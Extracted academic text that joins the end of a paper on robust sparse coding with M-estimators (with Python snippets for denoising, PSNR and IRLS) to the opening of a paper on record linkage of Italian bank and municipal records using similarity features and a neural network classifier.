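            den[i:i + patch, j:j + patch] += 1.0
    return num / den                        # element-wise average over overlapping patches
```

because ∑_ij r_ijᵀ r_ij is diagonal (it simply counts how many patches cover each pixel), the matrix inverse in the closed-form solution reduces to the element-wise division in the last line.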
the authors go one step further and propose learning the dictionary, d, as well; this is accomplished either from a corpus of high-quality images or from the corrupted image itself. the latter alternative results in a fully generative sparse modeling scheme. for more details regarding the denoising mechanisms, refer to elad & aharon ( ).

for our case, we focus on the sparse coding subproblem alone and utilize an overcomplete discrete cosine transform (dct) dictionary and overlapping square blocks. the remaining free parameters, λ and c, are set according to the heuristics presented in the original work. our major contribution is the robust estimation of the sparse codes via robomp, in order to handle potential outliers in a principled manner.

two types of zero-mean, homogeneous, additive noise (gaussian and laplacian) are simulated with different variance levels over independent runs. each run comprises separate contaminations of well-known images (lena, barbara, boats and house), followed by the different denoising frameworks, each one based on a distinct variant of omp. as before, every algorithm is referred to by the estimator exploited in its active set update stage. the tables below summarize the average performance measures (psnr in db) for the different variance levels of each noise distribution.

as expected, omp is roughly the best denoising framework for additive gaussian noise. however, in the laplacian case, cauchy achieves higher psnr levels throughout the entire experiment, which suggests that the cauchy m-estimator is more suitable for this type of non-gaussian environment. it is worth noting, though, that the averaging performed in the closed-form solution above could easily blur the impact of the sparse code solvers in this particular joint optimization. also, no attempt was made to search over the hyperparameter space of λ and c, which we suspect have different empirical optima depending on the noise distribution and the sparse code estimator. these results are simply preliminary and highlight the potential of robust denoising frameworks based on sparse and redundant representations.

(table: grand average psnr (db) of the estimated denoised images under zero-mean additive gaussian noise exploiting patch-based sparse and redundant representations; rows: noise level σ; columns: omp, gomp, cmp, cauchy, fair, huber, tukey, welsch.)
(table: grand average psnr (db) of the estimated denoised images under zero-mean additive laplacian noise exploiting patch-based sparse and redundant representations; same layout.)
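psnr is the figure of merit reported in these tables. for completeness, a minimal helper, assuming images stored as arrays with a known peak intensity (e.g., 255 for 8-bit grayscale):

```python
import numpy as np

def psnr(reference, estimate, peak=255.0):
    """peak signal-to-noise ratio in db between a reference image and its estimate."""
    mse = np.mean((np.asarray(reference, dtype=float) - np.asarray(estimate, dtype=float)) ** 2)
    if mse == 0:
        return float("inf")   # identical images
    return 10.0 * np.log10(peak ** 2 / mse)
```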
discussion
an example is considered a univariate outlier if it deviates from the rest of the distribution for a particular variable or component (andersen, ); a multivariate outlier extends this definition to more than one dimension. a regression outlier, however, is a very distinctive type of outlier: it is a point that deviates from the linear relation followed by most of the data given a set of predictors or explanatory variables. in this regard, the current work focuses on regression outliers alone. the active set update stage of omp explicitly models the interactions between the observation vector and the active atoms of the dictionary as purely linear. this relation is the main rationale behind robomp: regression outliers can be detected and downweighted when m-estimators replace the pervasive ols solver. if the inference process in sparse modeling incorporates higher-order interactions (as in vincent & bengio ( )), linear regression outliers become meaningless and other techniques are needed to downplay their influence. the relation between outliers in the observation vector and regression outliers is highly complex, due to the mixing of sources during the generative step, and demands further research.

even though other omp variants are used in practice for different purposes, e.g., gomp, romp and cosamp, we decided to disregard the last two flavors mainly due to three factors: space limitations, their inherent mse cost functions and, most importantly, the fact that both have been outperformed by cmp in experiments similar to the ones simulated here (wang, tang & li, ). the algorithm to beat was therefore cmp, due to its resemblance to an m-estimator-based omp. we believe we have provided sufficient evidence to deem robomp (and specifically the tukey variant) superior to cmp in a wide variety of tasks, performance measures and datasets. in this regard, it is worth noting that cmp reduces to the welsch algorithm with the norm of the errors as the estimated scale parameter (s = ‖e‖) and hyperparameter c = √m. the main drawback of such a heuristic is the use of a non-robust estimator of the scale, which, in turn, will bias the sparse code. the cmp authors introduce a data-dependent parameter of the exponential weight function (the gaussian kernel of correntropy) that relies on the dimensionality of the input, m. the rationale behind such an ad hoc choice is not fully justified; in contrast, we provide statistically sound arguments for our choice of the weight function hyperparameter, i.e., a prescribed asymptotic efficiency on the standard normal distribution. we believe this is the underlying reason behind the superiority of welsch over cmp on most of the synthetic data experiments and on the entirety of the simulations on the extended yale b database.

m-estimators are not the only alternative for robust linear regression. s-estimators (rousseeuw & yohai, ) are based on the residual scale of m-estimators; namely, s-estimation exploits the residual standard deviation of the errors to overcome the weakness of the re-scaled mad. another option is the so-called mm-estimators (yohai, ), which fuse s-estimation and m-estimation to achieve high breakdown points (bdp) and better efficiency. optimization for both s-estimators and mm-estimators is usually performed via irls. another common approach is the least median of squares method (rousseeuw, ), where the optimal parameters solve a non-linear minimization problem involving the median of squared residuals; its advantages include robustness to false matches and outliers, while its main drawback is the need for monte carlo sampling techniques to solve the optimization.
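all of the m-estimators compared in this work act through the same mechanism: inside an iteratively reweighted least squares (irls) loop, each residual receives a weight that shrinks as the residual grows. the sketch below is a generic illustration of that idea, not the authors' released implementation; the tuning constants shown are common textbook defaults and the re-scaled mad is one standard choice of scale estimate.

```python
import numpy as np

def huber_weight(r, c=1.345):
    a = np.abs(r)
    return np.where(a <= c, 1.0, c / np.maximum(a, 1e-12))   # quadratic center, linear tails

def tukey_weight(r, c=4.685):
    w = (1.0 - (r / c) ** 2) ** 2
    return np.where(np.abs(r) <= c, w, 0.0)                  # hard rejection of gross outliers

def m_estimate(X, y, weight_fn=tukey_weight, n_iter=25):
    """m-estimation of beta in y ~ X beta via iteratively reweighted least squares."""
    beta = np.linalg.lstsq(X, y, rcond=None)[0]              # ordinary least squares start
    for _ in range(n_iter):
        e = y - X @ beta
        s = 1.4826 * np.median(np.abs(e - np.median(e))) + 1e-12   # re-scaled mad of residuals
        w = weight_fn(e / s)
        Xw = X * w[:, None]
        beta = np.linalg.solve(X.T @ Xw, Xw.T @ y)           # weighted normal equations
    return beta
```

within robomp the same reweighting is applied to the least squares subproblem solved at every active set update of omp, i.e., where the plain ols step of the original algorithm would otherwise be.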
these three alternatives (s-estimation, mm-estimation and least median of squares) are left for potential further work, in order to analyze and compare the performance of several types of robust estimators applied to sparse coding. in terms of image denoising via robust, sparse and redundant representations, future work will involve the use of the weight vector in the block coordinate descent minimization in order to mitigate the effect of outliers. if sparse modeling is the final goal, k-svd (aharon, elad & bruckstein, ) is usually the preferred dictionary learning algorithm; however, in the presence of non-gaussian additive noise, the estimated dictionary might be biased as well, due to the explicit mse cost function of the sequential estimation of the generative atoms. plausible alternatives include correntropy-based cost functions (loza & principe, ) and ℓ₁-norm fidelity terms (loza, ).

in the spirit of openness and to encourage reproducibility, the matlab (mathworks) and python code corresponding to all the proposed methods and experiments of this paper is freely available at https://github.com/carlosloza/robomp.

conclusion
we investigated the prospect of m-estimation applied to sparse coding as an alternative to ls-based estimation and found that our hypothesis of exploiting m-estimators for better robustness is indeed valid. unlike the original orthogonal matching pursuit, our framework is able to handle outliers and non-gaussian errors in a principled manner. in addition, we introduced a novel robust sparse representation-based classifier that outperforms the current state of the art and similar robust variants. preliminary results on image denoising confirm the plausibility of the methods and open the door to future applications where robustness and sparseness are advantageous. the proposed five algorithms do not require parameter tuning from the user and, hence, constitute a suitable alternative to ordinary omp.

acknowledgements
the author would like to thank the editor and anonymous reviewers for their constructive comments.

additional information and declarations
funding: this work was supported by universidad san francisco de quito (poligrant). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures: the following grant information was disclosed by the author: universidad san francisco de quito (poligrant).
competing interests: the authors declare there are no competing interests.
author contributions: carlos a. loza conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
data availability: the following information was supplied regarding data availability: code is available at github: https://github.com/carlosloza/robomp; data (extended yale b database) is available at: http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html.

references
aharon m, elad m, bruckstein a. k-svd: an algorithm for designing overcomplete dictionaries for sparse representation. ieee transactions on signal processing.
andersen r. modern methods for robust regression. thousand oaks: sage.
chen ss, donoho dl, saunders ma. atomic decomposition by basis pursuit. siam review.
donoho dl, elad m, temlyakov vn. . stable recovery of sparse overcomplete representations in the presence of noise. ieee transactions on information theory ( ): – doi . /tit. . . loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/carlosloza/robomp http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /s x http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /peerj-cs. elad m, aharon m. . image denoising via sparse and redundant representations over learned dictionaries. ieee transactions on image processing ( ): – doi . /tip. . . elad m, figueiredo ma, ma y. . on the role of sparse and redundant rep- resentations in image processing. proceedings of the ieee ( ): – doi . /jproc. . . geman d, yang c. . nonlinear image recovery with half-quadratic regularization. ieee transactions on image processing ( ): – doi . / . . hogg rv. . statistical robustness: one view of its use in applications today. the american statistician ( ): – doi . / . huber pj. . robust statistics. in: international encyclopedia of statistical science. berlin: springer, – . lee k-c, ho j, kriegman dj. . acquiring linear subspaces for face recognition under variable lighting. ieee transactions on pattern analysis & machine intelligence ( ): – . liu w, pokharel pp, príncipe jc. . correntropy: properties and applications in non-gaussian signal processing. ieee transactions on signal processing ( ): – doi . /tsp. . . loza ca. . robust k-svd: a novel approach for dictionary learning. in: interna- tional workshop on artificial intelligence and pattern recognition. new york: springer, – . loza ca, principe jc. . a robust maximum correntropy criterion for dictionary learning. in: machine learning for signal processing (mlsp), ieee th international workshop on. piscataway: ieee, – . mallat s. . a wavelet tour of signal processing: the sparse way. orlando: academic press. mallat s, zhang z. . matching pursuit with time-frequency dictionaries. tech- nical report. courant institute of mathematical sciences new york united states ( ): – doi . / . . needell d, tropp ja. . cosamp: iterative signal recovery from incomplete and inaccurate samples. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . needell d, vershynin r. . signal recovery from incomplete and inaccurate measure- ments via regularized orthogonal matching pursuit. ieee journal of selected topics in signal processing ( ): – doi . /jstsp. . . nikolova m, ng mk. . analysis of half-quadratic minimization methods for signal and image recovery. siam journal on scientific computing ( ): – doi . / . olshausen ba, field dj. . emergence of simple-cell receptive field proper- ties by learning a sparse code for natural images. nature ( ): – doi . / a . rousseeuw p, yohai v. . robust regression by means of s-estimators. in: robust and nonlinear time series analysis. new york: springer, – . loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.acha. . . http://dx.doi.org/ . /jstsp. . http://dx.doi.org/ . / http://dx.doi.org/ . / a http://dx.doi.org/ . /peerj-cs. rousseeuw pj. . least median of squares regression. journal of the american statistical association ( ): – doi . / . . . tibshirani r. . regression shrinkage and selection via the lasso. journal of the royal statistical society. 
series b (methodological) ( ): – doi . /tit. . . tropp ja, gilbert ac. . signal recovery from random measurements via orthogonal matching pursuit. ieee transactions on information theory ( ): – doi . /tit. . . vincent p, bengio y. . kernel matching pursuit. machine learning ( – ): – doi . /a: . wang j, kwon s, shim b. . generalized orthogonal matching pursuit. ieee transactions on signal processing ( ): – doi . /tsp. . . wang y, tang yy, li l. . correntropy matching pursuit with application to robust digit and face recognition. ieee transactions on cybernetics ( ): – doi . /tcyb. . . wright j, yang ay, ganesh a, sastry ss, ma y. . robust face recognition via sparse representation. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . xu y, zhang d, yang j, yang j-y. . a two-phase test sample sparse representation method for use with face recognition. ieee transactions on circuits and systems for video technology ( ): – doi . /tcsvt. . . yohai vj. . high breakdown-point and high efficiency robust estimates for regres- sion. the annals of statistics ( ): – . zhang z. . parameter estimation techniques: a tutorial with application to conic fit- ting. image and vision computing ( ): – doi . /s - ( ) - . loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tcyb. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /tcsvt. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. submitted august accepted january published february corresponding author antonio maratea, antonio.maratea@uniparthenope.it academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright maratea et al. distributed under creative commons cc-by . open access record linkage of banks and municipalities through multiple criteria and neural networks antonio maratea, angelo ciaramella and giuseppe pio cianci department of science and technology, university of naples ‘‘parthenope’’, naples, italy abstract record linkage aims to identify records from multiple data sources that refer to the same entity of the real world. it is a well known data quality process studied since the second half of the last century, with an established pipeline and a rich literature of case studies mainly covering census, administrative or health domains. in this paper, a method to recognize matching records from real municipalities and banks through multiple similarity criteria and a neural network classifier is proposed: starting from a labeled subset of the available data, first several similarity measures are combined and weighted to build a feature vector, then a multi-layer perceptron (mlp) network is trained and tested to find matching pairs. for validation, seven real datasets have been used (three from banks and four from municipalities), purposely chosen in the same geographical area to increase the probability of matches. the training only involved two municipalities, while testing involved all sources (municipalities vs. municipalities, banks vs banks and and municipalities vs. banks). the proposed method scored remarkable results in terms of both precision and recall, clearly outperforming threshold-based competitors. 
subjects: artificial intelligence, data science, databases
keywords: record linkage, entity resolution, neural networks, feature extraction, deduplication

introduction
record linkage (rl from now on, also called entity resolution or entity matching) is the process of identifying records coming from different sources that refer to the same real-world entity. similarly, record deduplication (rd from now on) is the process of identifying duplicate records, where the same entity of the real world has been entered multiple times in the same database. the main difference between rl and rd is that records coming from different sources may lack a common identifier and schema (please refer to christen ( ) and zhang ( ) for a general discussion of related issues). the pairing of records or the identification of duplicates is a statistically challenging and computationally demanding problem: scarce data quality control results in errors, noise, missing values, omissions, ambiguities and even lies in the data, which, combined with the differences in database schemas and regional conventions as the number of nationalities grows, results in a daunting number of factors to be considered. the brute-force comparison all versus all (ava) of the records from different sources to discover occasional matches is unfeasible even for a modest volume of data. notwithstanding these difficulties, rl has been known and treated since the second half of the last century, with a rich literature in different domains (surveys in the context of data warehousing and for the different phases can be found in brizan & tansel ( ) and christen ( )) and an established implementation process (see 'phases of rl'). while data quality is related to and borrows techniques from rl and rd, it acts as an a priori filter, trying to prevent the emergence of duplicate records with a proper control process before data consolidation. rl and rd, on the contrary, act as a posteriori filters, trying to detect duplicate records and clean the data after consolidation. to the data analyst, they represent a required pre-processing step whenever it is legitimate to assume that the data to be analyzed are corrupted as a consequence of scarce quality control during acquisition, or come from sources that are heterogeneous with respect to time, place or context (please refer to batini & scannapieco ( ) for a general discussion of related issues). the traditional approach to rl and rd is probabilistic or rule-based, and only relatively recently have machine learning alternatives emerged (see zhao & ram ( )). the probabilistic approach is grounded on the estimation of probabilities of match and on thresholds for the similarity scores; the rule-based approach tries to explicitly model the knowledge of domain experts; the machine learning approach, on the contrary, relies only on data and can be cost-sensitive, supervised, unsupervised, or semi-supervised.
in the following, a multiple-criteria feature vector and a supervised classifier are proposed for the classification phase of the rl process, outperforming classic crude threshold-based methods and producing remarkable results. the paper is organized as follows: in 'background' the phases of a traditional rl process and the related literature on neural networks are sketched; in 'materials and methods' the proposed method is presented in detail; in 'experiments' the data used and the experiments are fully described; finally, in 'conclusions', the main conclusions are drawn.

background
first the currently established phases of an rl process are outlined, then the recent literature on neural networks applied to rl is summarized.

phases of rl
the rl of two sources generally involves five independent phases, each exploiting different techniques, criteria, and algorithms (christen, ):
1. data pre-processing: the two sources are cleaned and normalized to ensure that all the data have the same format and are as error free as possible;
2. indexing: to save time, the record pairs that are evidently different are filtered out from the comparisons through clustering, sorting or blocking. record linkage is exponential in nature, as each record from the first source should be compared with all the records from the other sources, hence indexing is critical for performance;
3. comparison: only the record pairs within the same block (or cluster) are actually compared one by one, using multiple similarity criteria that are conveyed into a similarity vector;
4. classification: the similarity vector obtained from each pair of records within the same block (or cluster) is classified into one of three groups:
   • (m) matches, that is pairs that do refer to the same entity of the real world;
   • (nm) non-matches, that is pairs that do not refer to the same entity of the real world;
   • (pm) potential matches or ambiguous pairs, that is pairs that cannot be classified with sufficient precision or reliability;
5. evaluation: the classified pairs are reviewed for final labeling. specifically, the pm class is subject to a clerical review, where domain experts decide for each ambiguous pair whether it is actually a match or not.

related work
being a possible consequence both of a poor data quality process and of natural differences in data evolving over time, rl has been found in countless domains and tackled using many techniques and approaches. the related literature can be broadly split into census, administrative or health-related applications, with a majority of works exploiting probabilistic methods. artificial neural networks (ann from now on) as classifiers are fewer in number and relatively recent. some of the main issues of administrative data linkage are privacy and confidentiality requirements and the absence of common identifiers (much like health data; please refer to harron et al. ( ) for a discussion and to vatsalan, christen & verykios ( ) for a taxonomy). while epidemiological studies linking census or administrative data to diseases are pretty common, the specific case of linking census with financial data at the individual level is rare, if not absent, in the rl literature.
the reason is that medical data are mostly held by public agencies that have a public interest in sharing their data and supporting medical research, while banks are private companies that keep their data safe and secure on their servers, having little interest in sharing their analysis. recent literature on machine learning applied to rl includes aiken et al. ( ), that compares probabilistic, stochastic and machine learning approaches, showing that supervised methods outperform unsupervised ones; dong & rekatsinas ( ), that surveys state-of-the-art data integration solutions based on machine learning with a discussion of open research challenges; kasai et al. ( ), that leverages deep learning in a combination of transfer and active learning aiming to save labeled data up to an order of magnitude; di cicco et al. ( ), that presents an attempt of explainable deep learning exploiting lime, a popular tool for prediction explanations in classification; hou et al. ( ), that propose a paradigm called ‘‘gradual machine learning’’ where data are labeled automatically through iterative factor graph inference, starting with the easiest instances and going up to the hardest ones. a survey of the state of the art is beyond the scope of this paper, so this section will focus on ann classifiers applied to classification in rl, in line with the recent explosion of ann related literature (please see maratea & ferone, ). maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. one of the first attempts is apparently due to zhao & ram ( ), that proposed a set of ensemble learning methods combining multiple base classifiers, including a backpropagation ann. records are compared through various similarity measures and classifiers are merged through bagging, boosting, stacking, cascading or cross-validated committees. using , records ( , non-matching examples and , matching examples) from an application service provider (asp) for the airline industry, the authors tried to identify the same customer that reserved different flights with different airline companies, reaching over % of accuracy. authors warn the reader on the limited generalization of the experiments due to the ‘‘somewhat balanced’’ data used. more recently, wilson ( ) showed on the base of genealogical databases that the results obtainable from the probabilistic rl are easily improvable through one of the various available machine learning or ann techniques, and that even a simple single layer perceptron network tends to outclassify the probabilistic approaches, reaching % of precision and . % of recall compared to . % precision and % recall of the probabilistic methods. a singular case is the work siegert et al. ( ) in the linkage of epidemiological cancer registries data previously pseudo-randomized through hashing and encrypted for privacy reasons. features are extracted from the obscured data and used as they were a new coding of the records, then the classification is performed on these coded data. similarly to zhao & ram ( ), multiple classifiers and ensembles are tested, with many aggregation functions. approximately , match pairs and , of not matches for a total of , pairs of records were manually classified from the north rhine-westphalia cancer registry in germany and used as training-set for the supervised learning classifiers. the proposed ann is structured with a single hidden layer of neurons and a sigmoidal activation function. 
among the three classifiers used, the one based on ann provided better results in both precision and recall terms, reaching a . % precision and . % recall. even in this case, data are artificially balanced. subitha & punitha ( ) propose the use of elman’s neural networks to pair the medical records collected by hand from different hospitals and departments, achieving an accuracy of % and a recall of % with respect to fuzzy decision trees ( % and %) and decision trees ( % and %). the comparing phase was performed using only the normalized levenshtein distance as the similarity criteria. the elman neural network (enn) is a particular type of neural network in which a layer of neurons called ‘‘context units’’ connected with a fixed weight of . both to the input and to the output of the hidden layer is added. in the context units, a copy of the last output of the hidden layer is saved to be used for subsequent inputs. in this way the network can maintain a sort of state, allowing tasks such as the prediction of sequences that go beyond the power of a standard multilayer perceptron. mudgal et al. ( ) present a general framework for the application of deep neural networks (dnn from now on) to rl, stressing connections with natural language processing: three type of problems are highlighted: structured, textual and dirty rl. their goal is to illustrate the benefits and limitations of dl when applied to rl. an empirical maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure block diagram of the proposed method. full-size doi: . /peerjcs. /fig- evaluation based on models and datasets is presented to show when dnn outperform traditional approaches, obtaining a relevant improvement in case of unstructured data. kooli, allesiardo & pigneul ( ) report a dnn application for rl using relevant word extraction and word embedding instead of the classic calculation of the similarity vector from record pairs. three architectures are compared: multi-layer perceptron (mlp), long short term memory networks (lstm) and convolutional neural networks (cnn) on poorly structured scientific publications databases by getting very good results and showing improvements compared to classical similarity-based approaches. the authors point out that their approach is fully automatic unlike a previous job of gottapu, dagli & ali ( ) that also uses dnn but in a human/machine hybrid fashion, by facilitating the manual categorization in a crowd-sourcing methodology, by proposing to the operator a list of possible matches. ebraheem et al. ( ) used unidirectional and bidirectional recurrent neural networks (rnns) with long short term memory (lstm) hidden units to convert each tuple to a distributed representation, which was the base for subsequent classification. experiments on datasets from different domains showed promising results. materials and methods a block representation of the proposed method is depicted in fig. : it involves the comparing and classifying phases of rl (see ‘phases of rl’): it takes as input pairs of records and classifies them into ‘‘match’’ (m) or ‘‘non-match’’ (nm) through an ann. the features of each candidate record pair are extracted by comparing each corresponding attribute with multiple similarity functions, resulting in a similarity vector (see below for more details). it is this similarity vector that is used for the subsequent classification of the candidate pair. 
in order to have comparable tests, all preceding phases use the same methods and parameters. data sources real data from separate municipal and banking databases have been gathered, chosen in the same geographical area to increase the probability of match (see table ). for both municipal and banking databases, each person is identified through the fiscal code (alias social security number, alias insurance number). being a natural key and a reliable field, this common identifier was leveraged to create, through joins, a gold standard for training and evaluation purposes: if in a pair, both records had the same value for the fiscal code, they are considered a true-match. the fiscal code is derivable from first name, last name, date and place of birth plus some special codes. surprisingly, clerical reviews showed that in rare cases even the fiscal code maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table used databases flanked by their size. database name type alias # record anag_uno municipal registry a , anag_due municipal registry b , anag_tre municipal registry c , anag_quattro municipal registry d , bcc_uno bank details x , , bcc_due bank details y , bcc_tre bank details z , table attributes in common between banking and municipal databases. attribute municipal column bank column surname cognome intestazione_a name nome intestazione_b sex sesso sesso birth state stato_nascita nazionalita birth date dat_nascita data_nascita birth place com_nas descr_com_nasc birth province prov_com_nas provincia_nasc via_dom address numero_civico_dom via_res zip code cap_dom cap_res province prov_com_dom prov_res telephone telefono numero_telefono presents some errors, i.e., does not correspond to the value derivable from the other fields of the record. this can lead to rare cases in which a pair of records is correctly classified as a match by the classifier but results indeed a false positive for the evaluation metric. for this reason, all the figures of merit presented hereafter have to be considered conservatively estimated. relevant attributes as a first step, it is necessary to select a subset of relevant and shared attributes between the municipal and banking databases to be used in the rl process. the selected attributes are shown in table . special attention should be paid to attributes address, zip code and province because they have a different meaning, representing the home address in municipalities databases and the residence address in banking databases. these values are often the same but do not always coincide. each attribute is cleaned, standardized and normalized through multiple transforma- tions, turning everything lower case, removing special symbols, punctuation, repeated spaces, non-alphabetic characters and finally normalizing accented letters. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. indexing indexing is performed with multiple blocking indexing, combining the results obtained from blocking keys. . blocking key : <surname, name, b.date>, using the double metaphone phonetic algorithm for the key comparison; . blocking key :<b.date, b.place, b.province>, using the double soundex phonetic algorithm for the key comparison; . 
blocking key : <surname, name, sex, b.date, b.place, b.province> using for the key comparison: the last character suffix for name and surname; the first character prefix for the birth place and province; and the year and month for the birth date. these blocking criteria were determined through experimental test and chosen to maximize the pair completeness as much as possible by keeping the number of candidate record pairs generated low, to reduce the execution time in view of the numerous tests to be performed. comparing in the comparison phase, the similarity of each pair of records (a,b) is measured using a set s of string-based similarity functions on the corresponding attributes (name of the first record with name of the second record, surname of the first record with surname of the second record and so on). each comparison function has a normalized output in the interval [ , ]. where indicates maximum dissimilarity and indicates maximum similarity (please see navarro, ; christen, ). the set s of comparison functions used is listed below: (a) jaro–winkler, (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. each one of the corresponding attributes pairs (ai,bi) is compared using all the function in the set and the resulting values are then chained in a similarity vector s. s=sims(a ,b )⊕sims(a ,b )⊕sims(a ,b )⊕ ... figure shows an example of this procedure. at the end, each pair of records will be associated with a similarity vector to be used for classification. classifying the ann used for the classification is shown in the fig. , it’s a fully connected multilayer perceptron network (mlp from now on), with two hidden layers in a pyramidal structure, a relu activation function: relu(x)=x+=max( ,x) and a softmax cross entropy loss function: l(y,ŷ)= ∑ i h(yi,ŷi)= ∑ i yi ·logŷi. the optimal number of neurons and the size of the layers have been determined through iterative optimization on experimental tests. the final architecture is: maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of the similarity vector obtained comparing two records using four similarity func- tions (please see table for attribute mapping). full-size doi: . /peerjcs. /fig- • input layer: a layer of as many neurons as the components of the similarity vectors to be classified; • hidden layer: two layers to form a pyramidal structure, the first with and the second with neurons; • output layer: a layer of two neurons, one for the class of the matches (m) and the other for the non-matches (nm). for the initialization the glorot_uniform_initializer (aka xavier uniform initializer) was used. with this random initalization of the mlp parameters no relevant changes in the performance were noted over different runs. the network was trained using the adam optimizer by applying a l regularization to avoid overfitting. training data-set generation the training data-set, in the format (feature,label) is generated based on the candidate record pairs identified in the indexing phase between databases a and b, where: • feature: is the similarity vector obtained comparing the records of the pair; • label: is true-match (m) or true-not match (nm), according to the gold standard. the built training data-set contains , samples, , of which are labeled as true-match (m) and as true-non-match (nm). 
since non-matching record pairs are more than matching ones, the training data are moderately imbalanced (they are in the same order of magnitude). over-sampling techniques like adasyn (he et al., ) and based on smote, such as smotenc (bowyer et al., ) smotenn (batista, prati & monard, ), smotetomek (batista, maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure used fully connected mlp architetture for the classifyng phase. where the input layer as many neurons as the components of the similarity vectors to be classified. there are two hidden layers one of size and the other of and the output layer is composed of two units, one for the class of the matches (m) and the other for the non-matches (nm). the activation function used is the relu and the loss function is the softmax cross entropy. the weights are initalized with xavier uniform initializer and the training was performed using the adam optimizer by applying a l regularization. full-size doi: . /peerjcs. /fig- bazzan & monard, ) have been tested, without any significant improvement, so oversampling was skipped from final experiments. experiments for each test the same set of attributes, pre-processing and indexing techniques have been used in order to focus on the comparing and classifying phases. figure shows the starting condition for the tests in order to have a reference on the number of true-match and of pairs identified by the indexing between the various coupled databases. since there are seven different databases available, grouped in municipalities (four) and banks (three), executions will be performed for each test, pairing databases between groups and excluding deduplication (that is the match of a database against itself). only the pair (a, b) is used as training-set. the chosen figure of merits are precision and recall, preferred to plain accuracy due to the moderate imbalance, as explained by christen & goiser ( ). their average and standard deviation over the runs are reported in the following. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure tests starting conditions after the indexing phase, for all the possible pairs of databases. (a) number of candidate record pairs to be classified, obtained from the indexing phase. (b) number of true- match record pair in the gold standard. (c) pair completeness, i.e., percentage of true match retrieved in the indexing phase with respect to the gold standard. full-size doi: . /peerjcs. /fig- figure exact matching results. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- exact matching in the very first test, rl has been performed with an exact match goal, where the candidate record pairs are classified as match only if all the respective fields are perfectly equal. this test has been carried out only to show how much two databases, while containing the same information, actually differ in the values of their attributes. as expected (fig. ), the precision is extremely high, but the number of matches is extremely low, as shown by the recall. in fact, in some cases no pair have been identified, with a maximum of only matches, by consequence of errors, noise, and random variations in the corresponding data. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . 
/peerj-cs. figure results for levenshtein normalized distance with threshold θ = . . (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- threshold based classification in the next test an optimal binary threshold classifier was used. the threshold value was determined through a pr graph (precision–recall) generated on the training data-set. as threshold, the value having coordinates closest to the ideal point ( . , . ) was chosen (see figs. a –a ). levenshtein threshold in this test, the only similarity criterion was the levenshtein normalized distance (levenshtein, )—one of the most widely used comparison metrics. • comparing : levenshtein normalized distance. • classifying : binary threshold with θ = . as optimal value, applied to the weighted sum of the similarity vector. • weighting : each attribute has the same importance and weight. figure shows the results obtained on the executions. the average precision is , % and the average recall is , %, although with high variability. multiple criteria threshold in this test, multiple comparison criteria for each attribute were used, with the underlying idea that different criteria measure different facets of the similarity between them. recall actually improved. • comparing : each attribute is compared using the following metrics: (a) jaro–winkler, (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. • classifying : binary threshold with θ = . as optimal value applied to the weighted sum of the similarity vector. • weighting : each attribute has the same importance and weight. figure shows the results of the executions: the average precision is , % and the average recall is , %, although with high variability. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results for multiple criteria similarity with threshold θ = . , unweighted. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- weighted multiple criteria threshold in this test, the previous results were improved by varying the importance of the various fields through an appropriate weighing. the weights, for each attribute, were automatically determined based on their distinct values distribution, and normalized in such a way that their sum is equal to . (see fig. a ). among the various possibilities of normalization (linear, max, quadratic, exp ...) that logarithmic seems to give the best results for both overall precision and recall maintaining low variance (see fig. a ). • comparing : each attribute is compared using the following metrics: (a) jaro–winkler, (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. • classifying : binary threshold with θ = . as optimal value applied to the weighted sum of the similarity vector. • weighting : the weights of the various attributes are estimated according to the distribution of their distinct values and normalized using a logarithmic function. the associated weight is directly proportional to the number of distinct values over the totals. figure shows the results of the executions: the average precision is , % and the average recall is , %, with low 